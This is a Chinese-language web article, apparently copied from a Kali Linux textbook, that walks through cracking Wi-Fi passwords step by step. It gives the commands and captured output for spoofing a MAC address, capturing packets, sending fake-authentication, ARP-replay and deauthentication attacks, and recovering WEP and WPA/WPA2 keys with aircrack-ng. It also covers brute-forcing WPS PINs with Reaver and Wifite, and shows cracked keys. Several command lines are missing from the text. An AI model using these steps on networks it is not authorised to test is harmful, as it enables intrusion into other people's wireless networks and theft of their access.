这篇文章给大家聊聊关于破解无线网络密码的软件,以及ng工具破解无线网络对应的知识点,希望对各位有所帮助,不要忘了收藏本站哦。
Aircrack-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具。该工具主要用了两种攻击方式进行WEP破解。一种是FMS攻击,该攻击方式是以发现该WEP漏洞的研究人员名字(ScottFluhrer、ItsikMantin及AdiShamir)所命名;另一种是Korek攻击,该攻击方式是通过统计进行攻击的,并且该攻击的效率要远高于FMS攻击。本节将介绍使用Aircrack-ng破解无线网络。
WiredEquivalentPrivacy或WEP(有线等效加密)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络。不过密码分析学家已经找出WEP好几个弱点,因此在2003年被Wi-FiProtectedAccess(WPA)淘汰,又在2004年由完整的IEEE802.11i标准(又称为WPA2)所取代。本小节将介绍破解WEP加密的无线网络。
使用Aircrack破解使用WEP加密的无线网络。具体操作步骤如下所示。
(1)使用airmon-ng命令查看当前系统中的无线网络接口。执行命令如下所示:
输出的信息表示,当前系统中存在一个无线网络接口。从输出结果的Interface列,可以看到当前系统的无线接口为wlan0。
(2)修改wlan0接口的MAC地址。因为MAC地址标识主机所在的网络,修改主机的MAC地址可以隐藏真实的MAC地址。在修改MAC地址之前,需要停止该接口。执行命令如下所示:
root@kali:~#ifconfigwlan0downn
执行以上命令后,wlan0接口则停止。此时就可以修改MAC地址了,执行命令如下所示:
root@kali:~#macchanger--mac00:11:22:33:44:55wlan0nPermanentMAC:00:c1:40:76:05:6c(unknown)nCurrentMAC:00:c1:40:76:05:6c(unknown)nNewMAC:00:11:22:33:44:55(CimsysInc)n
输出的信息显示了wlan0接口永久的MAC地址、当前的MAC地址及新的MAC地址。可以看到wlan1接口的MAC地址已经被修改。
(3)重新启动wlan0。执行命令如下所示:
输出的信息显示了无线网卡wlan0的芯片及驱动类型。例如,当前系统的无线网卡芯片为RalinkRT2870/3070;默认驱动为rt2800usb,并显示监听模式被启用,映射网络接口为mon0。
有时候使用airmon-ngstartwlan0命令启用无线网卡时,可能会出现SIOCSIFFLAGS:OperationnotpossibleduetoRF-kill错误。这是因为Linux下有一个软件RF-kill,该软件为了省电会将不使用的无线设备(如WIFI和Buletooth)自动关闭。当用户使用这些设备时,RF-kill不会智能的自动打开,需要手动解锁。用户可以执行rfkilllist命令查看所有设备,如下所示:
root@kali:~#rfkilllistn0:ideapad_wlan:WirelessLANnSoftblocked:yesnHardblocked:non1:phy0:WirelessLANnSoftblocked:yesnHardblocked:non
该列表中前面的编号,表示的是设备的索引号。用户可以通过指定索引号,停止或启用某个设备。如启用所有设备,执行如下所示的命令:
root@kali:~#rfkillunblockalln
执行以上命令后,没有任何信息输出。以上命令表示,解除所有被关闭的设备。
(4)使用airodump命令定位附近所有可用的无线网络。执行命令如下所示:
以上输出的信息显示了附近所有可用的无线网络。当找到用户想要攻击的无线路由器时,按下Ctrl+C键停止搜索。
从输出的信息中看到有很多参数。详细介绍如下所示。
(5)使用airodump-ng捕获指定BSSID的文件。执行命令如下所示。
airodump-ng命令常用的选项如下所示。
下面将Bssid为14:E6:E4:AC:FB:20的无线路由器作为攻击目标。执行命令如下所示:
从输出的信息中可以看到ESSID为Test无线路由器的#Data一直在变化,表示有客户端正与无线发生数据交换。以上命令执行成功后,会生成一个名为wirelessattack-01.ivs的文件,而不是wirelessattack.ivs。这是因为airodump-ng工具为了方便后面破解的时候调用,所有对保存文件按顺序编了号,于是就多了-01这样的序号,以此类推。在进行第二次攻击时,若使用同样文件名wirelessattack保存的话,就会生成名为wirelessattack-02.ivs文件。
(6)打开一个新的终端窗口,运行aireplay命令。aireplay命令的语法格式如下所示:
aireplay-ng-10-a[BSSID]-h[ourChosenMACaddress]-e[ESSID][Interface]naireplay-ng-dauth1-a[BSSID]-c[ourChosenMACaddress][Interface]n
启动aireplay,执行命令如下所示:
root@kali:~#aireplay-ng-10-a14:E6:E4:AC:FB:20-h00:11:22:33:44:55-eTestmon0nTheinterfaceMAC(00:C1:40:76:05:6C)doesn'tmatchthespecifiedMAC(-h).nifconfigmon0hwether00:11:22:33:44:55n17:25:17Waitingforbeaconframe(BSSID:14:E6:E4:AC:FB:20)onchannel1n17:25:17SendingAuthenticationRequest(OpenSystem)[ACK]n17:25:17Switchingtosharedkeyauthenticationn17:25:19SendingAuthenticationRequest(SharedKey)[ACK]n17:25:19Switchingtosharedkeyauthenticationn17:25:21SendingAuthenticationRequest(SharedKey)[ACK]n17:25:21Switchingtosharedkeyauthenticationn17:25:23SendingAuthenticationRequest(SharedKey)[ACK]n17:25:23Switchingtosharedkeyauthenticationn17:25:25SendingAuthenticationRequest(SharedKey)[ACK]n17:25:25Switchingtosharedkeyauthenticationn17:25:27SendingAuthenticationRequest(SharedKey)[ACK]n17:25:27Switchingtosharedkeyauthenticationn17:25:29SendingAuthenticationRequest(SharedKey)[ACK]n17:25:29Switchingtosharedkeyauthenticationn
(7)使用aireplay发送一些流量给无线路由器,以至于能够捕获到数据。语法格式如下所示:
aireplay-ng3-b[BSSID]-h[OurchosenMACaddress][Interface]n
执行命令如下所示:
root@kali:~#aireplay-ng-3-b14:E6:E4:AC:FB:20-h00:11:22:33:44:55mon0nTheinterfaceMAC(00:C1:40:76:05:6C)doesn'tmatchthespecifiedMAC(-h).nifconfigmon0hwether00:11:22:33:44:55n17:26:54Waitingforbeaconframe(BSSID:14:E6:E4:AC:FB:20)onchannel1nSavingARPrequestsinreplay_arp-0515-172654.capnYoushouldalsostartairodump-ngtocapturereplies.nNotice:gotadeauth/disassocpacket.IsthesourceMACassociated?nRead1259packets(got1ARPrequestsand189ACKs),sent198packets…(499ppsnRead1547packets(got1ARPrequestsand235ACKs),sent248packets…(499ppsnRead1843packets(got1ARPrequestsand285ACKs),sent298packets…(499ppsnRead2150packets(got1ARPrequestsand333ACKs),sent348packets…(499ppsnRead2446packets(got1ARPrequestsand381ACKs),sent398packets…(499ppsnRead2753packets(got1ARPrequestsand430ACKs),sent449packets…(500ppsnRead3058packets(got1ARPrequestsand476ACKs),sent499packets…(500ppsnRead3367packets(got1ARPrequestsand525ACKs),sent548packets…(499ppsnRead3687packets(got1ARPrequestsand576ACKs),sent598packets…(499ppsnRead4001packets(got1ARPrequestsand626ACKs),sent649packets…(500ppsnRead4312packets(got1ARPrequestsand674ACKs),sent699packets…(500ppsnRead4622packets(got1ARPrequestsand719ACKs),sent749packets…(500ppsnRead4929packets(got1ARPrequestsand768ACKs),sent798packets…(499ppsnRead5239packets(got1ARPrequestsand817ACKs),sent848packets…(499ppsn
输出的信息就是使用ARPRequests的方式来读取ARP请求报文的过程,此时回到airodump-ng界面查看,可以看到Test的Frames栏的数字在飞速的递增。在抓取的无线数据报文达到了一定数量后,一般都是指IVsX值达到2万以上时,就可以开始破解,若不能成功就等待数据包文继续抓取,然后多尝试几次。
(8)使用Aircrack破解密码。执行命令如下所示:
从输出的结果中可以看到KEYFOUND,表示密码已经找到,为abcde。
WPA全名为Wi-FiProtectedAccess,有WPA和WPA2两个标准。它是一种保护无线电脑网络安全的协议。对于启用WPA/WPA2加密的无线网络,其攻击和破解步骤及攻击是完全一样的。不同的是,在使用airodump-ng进行无线探测的界面上,会提示为WPACCMPPSK。当使用aireplay-ng进行攻击后,同样获取到WPA握手数据包及提示;在破解时需要提供一个密码字典。下面将介绍破解WPA/WPA2无线网络的方法。
使用aircrack-ng破解WPA/WPA2无线网络的具体操作步骤如下所示。
(1)查看无线网络接口。执行命令如下所示:
(2)停止无线网络接口。执行命令如下所示:
(3)修改无线网卡MAC地址。执行命令如下所示:
root@kali:~#macchanger--mac00:11:22:33:44:55wlan0nPermanentMAC:00:c1:40:76:05:6c(unknown)nCurrentMAC:00:c1:40:76:05:6c(unknown)nNewMAC:00:11:22:33:44:55(CimsysInc)n
(4)启用无线网络接口。执行命令如下所示:
(5)捕获数据包。执行命令如下所示:
(6)对无线路由器Test进行Deauth攻击。执行命令如下所示:
root@kali:~#aireplay-ng--deauth1-a14:E6:E4:AC:FB:20-c00:11:22:33:44:55mon0n17:50:27Waitingforbeaconframe(BSSID:14:E6:E4:AC:FB:20)onchannel1n17:50:30Sending64directedDeAuth.STMAC:[00:11:22:33:44:55][12|59ACKs]n
(7)破解密码。执行命令如下所示:
从输出的信息中可以看到无线路由器的密码已经成功破解。在KEYFOUND提示的右侧可以看到密码已被破解出,为daxueba,破解速度约为500.88k/s。
WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定标准。该标准主要是为了解决无线网络加密认证设定的步骤过于繁杂的弊病。因为通常用户往往会因为设置步骤太麻烦,以至于不做任何加密安全设定,从而引起许多安全上的问题。所以很多人使用WPS设置无线设备,可以通过个人识别码(PIN)或按钮(PBC)取代输入一个很长的密码短语。当开启该功能后,攻击者就可以使用暴力攻击的方法来攻击WPS。本小节将介绍使用各种工具攻击WPS。
现在大部分路由器上都支持WPS功能。以前路由器有专门的WPS设置,现在的路由器使用QSS功能取代了。这里以TP-LINK型号为例,介绍设置WPS功能,如图9.15所示。如果使用WPS的PBC方式,只需要按下路由器上的QSS/RESET按钮就可以了。
从该界面可以看到QSS功能已开启,可以看到当前的PIN码是04588306。这里可以重新生成新的PIN码,或者恢复初始PIN码。
【实例9-1】使用Reaver破解WPS。具体操作步骤如下所示。
(1)插入无线网卡,使用ifconfig命令查看无线网卡是否已经正确插入。执行命令如下所示:
root@Kali:~#ifconfigneth0Linkencap:EthernetHWaddr00:19:21:3f:c3:e5ninetaddr:192.168.5.4Bcast:192.168.5.255Mask:255.255.255.0ninet6addr:fe80::219:21ff:fe3f:c3e5/64Scope:LinknUPBROADCASTRUNNINGMULTICASTMTU:1500Metric:1nRXpackets:10541errors:0dropped:0overruns:0frame:0nTXpackets:7160errors:0dropped:0overruns:0carrier:0ncollisions:0txqueuelen:1000nRXbytes:4205470(4.0MiB)TXbytes:600691(586.6KiB)nloLinkencap:LocalLoopbackninetaddr:127.0.0.1Mask:255.0.0.0ninet6addr:::1/128Scope:HostnUPLOOPBACKRUNNINGMTU:65536Metric:1nRXpackets:296errors:0dropped:0overruns:0frame:0nTXpackets:296errors:0dropped:0overruns:0carrier:0ncollisions:0txqueuelen:0nRXbytes:17760(17.3KiB)TXbytes:17760(17.3KiB)n
从输出的信息中可以看到,只有一个以太网接口eth0。这是因为无线网卡可能没有启动,首先来启动该无线网卡。执行命令如下所示:
root@Kali:~#ifconfigwlan0upn
执行以上命令后,没有任何信息输出。此时再次执行ifconfig命令,查看无线网络是否已启动,如下所示:
root@Kali:~#ifconfign......nwlan0Linkencap:EthernetHWaddr08:10:76:49:c3:cdnUPBROADCASTMULTICASTMTU:1500Metric:1nRXpackets:0errors:0dropped:0overruns:0frame:0nTXpackets:0errors:0dropped:0overruns:0carrier:0ncollisions:0txqueuelen:1000nRXbytes:0(0.0B)TXbytes:0(0.0B)n
看到以上输出信息,则表示无线网卡已成功启动,其网络接口为wlan0。
(2)启动无线网卡为监听模式。执行命令如下所示:
从输出的信息中,可以看到monitormodeenabledonmon0,表示无线网卡已启动监听模式。在以上信息中,还可以看到无线网卡的芯片级驱动类型。其中,该网卡的芯片为Ralink,默认驱动为rt2800usb。
注意:执行以上命令启动监听模式,一定要确定正确识别无线网卡的芯片和驱动。否则,该无线网卡可能导致攻击失败。
(3)攻击WPS。执行命令如下所示:
root@kali:~#reaver-imon0-b14:E6:E4:AC:FB:20-vvnReaverv1.4WiFiProtectedSetupAttackToolnCopyright(c)2011,TacticalNetworkSolutions,CraigHeffner<cheffner@tacnetsol.com>n[+]Waitingforbeaconfrom14:E6:E4:AC:FB:20n[+]Switchingmon0tochannel1n[+]Switchingmon0tochannel2n[+]Switchingmon0tochannel3n[+]Switchingmon0tochannel11n[+]Switchingmon0tochannel4n[+]Switchingmon0tochannel5n[+]Switchingmon0tochannel6n[+]Switchingmon0tochannel7n[+]Associatedwith8C:21:0A:44:09:F8(ESSID:yztxty)n[+]Tryingpin12345670n[+]SendingEAPOLSTARTrequestn[+]Receivedidentityrequestn[+]Sendingidentityresponsen[+]Receivedidentityrequestn[+]Sendingidentityresponsen[+]ReceivedM1messagen[+]SendingM2messagen[+]ReceivedM3messagen[+]SendingM4messagen[+]ReceivedWSCNACKn[+]SendingWSCNACKn......n
从以上输出信息中,可以看到正在等待连接到14:E6:E4:AC:FB:20无线路由器的信号。并且通过发送PIN信息,获取密码。
如果没有路由器没有开启WPS的话,将会出现如下所示的信息:
[!]WARNING:Failedtoassociatewith14:E6:E4:AC:FB:20(ESSID:XXXX)n
FernWiFiCracker是一个非常不错的工具,用来测试无线网络安全。后面将会介绍使用该工具,攻击Wi-Fi网络。这里首先介绍使用FernWiFiCracker工具来攻击WPS。
【实例9-2】使用Wifite攻击WPS。具体操作步骤如下所示。
(1)启动Wifite工具,并指定使用common.txt密码字典。在命令行终端执行如下所示的命令:
root@kali:~#wifite-dictcommon.txtn
执行以上命令后,将显示如下所示的信息:
以上信息显示了WiFite工具的版本信息,支持平台,并且开始扫描无线网络。当扫描到想要破解的无线网络时,按下CTRL+C组合键停止扫描。
(2)停止扫描无线网络,将显示如下所示的信息:
从以上输出信息中,可以看到扫描到五个无线接入点和三个客户端。在输出信息中,共显示了7列。分别表示无线接入点编号、ESSID号、信道、加密方式、电功率、是否开启wps和客户端。如果仅有一个客户端连接到无线接入点,则CLIENT列显示是client。如果有多个客户端连接的话,则显示是clients。
(3)此时,选择要攻击的无线接入点。这里选择第五个无线接入点,输入“1”。然后按下回车键将开始攻击,显示信息如下所示:
[+]selecttargetnumbers(1-5)separatedbycommas,or'all':1n[+]1targetselected.n[0:00:00]initializingWPSPINattackonyzty(EC:17:2F:46:70:BA)n[0:11:00]WPSattack,0/0success/ttl,n[!]unabletocompletesuccessfultryin660secondsn[+]skippingyztyn[0:08:20]startingwpahandshakecaptureon"yzty"n[0:08:11]newclientfound:18:DC:56:F0:62:AFn[0:08:09]listeningforhandshake…n[0:00:11]handshakecaptured!savedas"hs/yzty_EC-17-2F-46-70-BA.cap"n[+]2attackscompleted:n[+]1/2WPAattackssucceedednyzty(EC:17:2F:46:70:BA)handshakecapturednsavedashs/yzty_EC-17-2F-46-70-BA.capn[+]startingWPAcrackeron1handshaken[0:00:00]crackingyztywithaircrack-ngn[+]crackedyzty(EC:17:2F:46:70:BA)!n[+]key:"huolong5"n[+]quittingn
从输出的信息中,可以看到破解出yzty无线设备的密码为huolong5。
END,本文到此结束,如果可以帮助到大家,还望关注本站哦!
还没有评论,来说两句吧...